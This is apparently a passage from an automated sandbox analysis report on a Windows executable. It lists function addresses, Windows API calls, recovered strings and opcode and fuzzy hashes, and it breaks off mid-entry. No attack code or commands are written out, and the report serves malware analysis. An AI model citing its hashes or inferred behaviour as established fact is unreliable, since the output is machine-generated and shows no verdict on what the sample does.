                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                              • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                              • GetLastError.KERNEL32 ref: 0041855C
                                                              • Sleep.KERNEL32(00000064), ref: 00418571
                                                              • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                              • GetLastError.KERNEL32 ref: 0041858E
                                                              • Sleep.KERNEL32(00000064), ref: 004185A3
                                                              • free.MSVCRT ref: 004185AC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: File$AttributesDeleteErrorLastSleep$free
                                                              • String ID:
                                                              • API String ID: 2802642348-0
                                                              • Opcode ID: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                              • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                              • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                              Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                              • wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                              • wcslen.MSVCRT ref: 0040D1D3
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                              • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                              • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                              • String ID: strings
                                                              • API String ID: 3166385802-3030018805
                                                              • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                              • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                              • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                              Function 0040541F Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                              • memset.MSVCRT ref: 00405455
                                                              • memset.MSVCRT ref: 0040546C
                                                              • memset.MSVCRT ref: 00405483
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$memcpy$ErrorLast
                                                              • String ID: 6$\
                                                              • API String ID: 404372293-1284684873
                                                              • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                              • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                              • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                              Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                              • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                              • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                              • wcscpy.MSVCRT ref: 0040A0D9
                                                              • wcscat.MSVCRT ref: 0040A0E6
                                                              • wcscat.MSVCRT ref: 0040A0F5
                                                              • wcscpy.MSVCRT ref: 0040A107
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                              • String ID:
                                                              • API String ID: 1331804452-0
                                                              • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                              • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                              • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                              Function 00404363 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                              • String ID: advapi32.dll
                                                              • API String ID: 2012295524-4050573280
                                                              • Opcode ID: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                                                              • Opcode Fuzzy Hash: 65f3d33700ac9d510cc5e5eb6f652d35bee5e6265e8d5a0c26d000a27f9b730c
                                                              • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                                                              Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • <?xml version="1.0" ?>, xrefs: 0041007C
                                                              • <%s>, xrefs: 004100A6
                                                              • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memset$_snwprintf
                                                              • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                              • API String ID: 3473751417-2880344631
                                                              • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                              • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                              • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                              Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcscat$_snwprintfmemset
                                                              • String ID: %2.2X
                                                              • API String ID: 2521778956-791839006
                                                              • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                              • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                              • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                              Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _snwprintfwcscpy
                                                              • String ID: dialog_%d$general$menu_%d$strings
                                                              • API String ID: 999028693-502967061
                                                              • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                              • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                              • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                              Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                              • memset.MSVCRT ref: 0040C439
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                              • _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                              • memset.MSVCRT ref: 0040C4D0
                                                              • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                              • String ID:
                                                              • API String ID: 4131475296-0
                                                              • Opcode ID: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                              • Opcode Fuzzy Hash: 82fa03ba5326a94bf532841c06629f00165d9272e62604655f27a07229e6f7ea
                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                              Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004116FF
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2618321458-3614832568
                                                              • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                              • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                              Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AttributesFilefreememset
                                                              • String ID:
                                                              • API String ID: 2507021081-0
                                                              • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                              • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                              • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                              Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                              • malloc.MSVCRT ref: 00417524
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                              • free.MSVCRT ref: 00417544
                                                              • free.MSVCRT ref: 00417562
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                              • String ID:
                                                              • API String ID: 4131324427-0
                                                              • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                              • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                              • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                              Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                              • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                              • free.MSVCRT ref: 0041822B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: PathTemp$free
                                                              • String ID: %s\etilqs_$etilqs_
                                                              • API String ID: 924794160-1420421710
                                                              • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                              • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                              • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                              Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                              • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                              • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                              • API String ID: 3510742995-272990098
                                                              • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                              • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                              • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                              Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0044A6EB
                                                              • memset.MSVCRT ref: 0044A6FB
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                              • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                              • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                              Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • AreFileApisANSI.KERNEL32 ref: 00417497
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                              • malloc.MSVCRT ref: 004174BD
                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                              • free.MSVCRT ref: 004174E4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                              • String ID:
                                                              • API String ID: 4053608372-0
                                                              • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                              • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                              • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                              Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetParent.USER32(?), ref: 0040D453
                                                              • GetWindowRect.USER32(?,?), ref: 0040D460
                                                              • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                              • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                              • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                              Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                              • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                              • memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                              • String ID:
                                                              • API String ID: 1471605966-0
                                                              • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                              • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                              • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                              Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • wcscpy.MSVCRT ref: 0044475F
                                                              • wcscat.MSVCRT ref: 0044476E
                                                              • wcscat.MSVCRT ref: 0044477F
                                                              • wcscat.MSVCRT ref: 0044478E
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2141514493.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
